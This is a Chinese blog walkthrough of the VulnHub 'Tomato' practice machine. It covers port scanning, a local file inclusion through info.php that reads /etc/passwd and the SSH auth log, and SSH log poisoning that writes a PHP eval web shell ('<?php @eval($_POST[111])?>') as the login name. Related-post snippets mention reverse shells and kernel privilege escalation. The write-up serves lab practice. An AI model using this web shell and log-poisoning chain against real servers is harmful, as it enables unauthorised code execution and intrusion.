tomato靶场打靶过程

于 2024-08-02 23:36:25 发布
阅读量314 收藏 1
点赞数 7
文章标签: 安全性测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/140882281
版权

  信息收集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.248.133

  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-10000 192.168.248.133,发现开放了 21、80、2211、8888 四个端口

漏洞发现

  • 访问 http://192.168.248.133/antibot_image/antibots/info.php,找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞

漏洞利用

http://192.168.248.133/antibot_image/antibots/info.php?image=/etc/passwd

前面信息搜集时发现开放了 2211 端口,服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件

先查看日志文件是不是在默认路径:http://192.168.248.133/antibot_image/antibots/info.php?image=/var/log/auth.log

  • 利用 ssh 连接,写入一句话木马:ssh '<?php @eval($_POST[111])?>'@192.168.248.133 -p2211,蚁剑连接
  • 之所以用CentOS连接是因为kali2024bug导致ssh连接报错

  • 蚁剑连接的目录是/var/log/auth.log

  • 总结

  • 本次打靶利用的是文件包含漏洞包含日志GetShell,通过写入错误登录信息连接shell

安全beginner
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 435
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
tomato靶场复现
m0_68471358的博客
08-03 407
在多次尝试后,发现/var/log/auth.log中记录了FTP和SSH的登录服务,我们使用root和root123123123123123账户尝试ssh登录,可以看到被写入到了auth.log日志文件中,如果我们换成一句话木马内容,并且写入到此日志文件中,就可以使用系统目前的文件包含漏洞加载此日志文件,加载一句话木马。include语句会获取指定文件中存在的所有文本/代码/标记,文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
vulnhub靶场-tomato
qq_42947816的博客
03-07 7540
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
tomato靶场
weixin_69065643的博客
07-29 347
访问/etc/passwd/发现确实有文件包含漏洞。产看iofo.php源码,发现里面有文件包含漏洞。我们用kali扫描一下目录。
tomato靶场练习
weixin_69602647的博客
07-29 295
tomato靶场练习
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1527
小白学渗透
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1866
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1239
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
vulnhub靶场Tomato
kukudeshuo的博客
07-25 663
vulnhub靶场Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机:Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
tomato打印服务共享教程
06-01
整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络打印机;手机打印设置。 配置服务器、启动打印服务功能 在开始配置之前,需要确认电脑的本地连接...
tomato固件
01-01
tomato-K26-1.28.20141211MIPSR2-Arctic-MultiWAN-Micro-NoUSB 亲测可用
Postman 中的 API 安全性测试:最佳实践与技巧
2402_85762143的博客
07-12 656
通过本文的介绍,你应该对如何在 Postman 中进行 API 的安全性测试有了深入的了解。记住,安全性测试是一个持续的过程,需要定期进行以应对不断变化的安全威胁。使用 Postman 提供的工具和技巧,你可以为你的 API 构建一个强大的安全防线。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8359
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL)
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
层次分析法数学建模论文.doc
最新发布
08-01
层次分析法数学建模论文
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值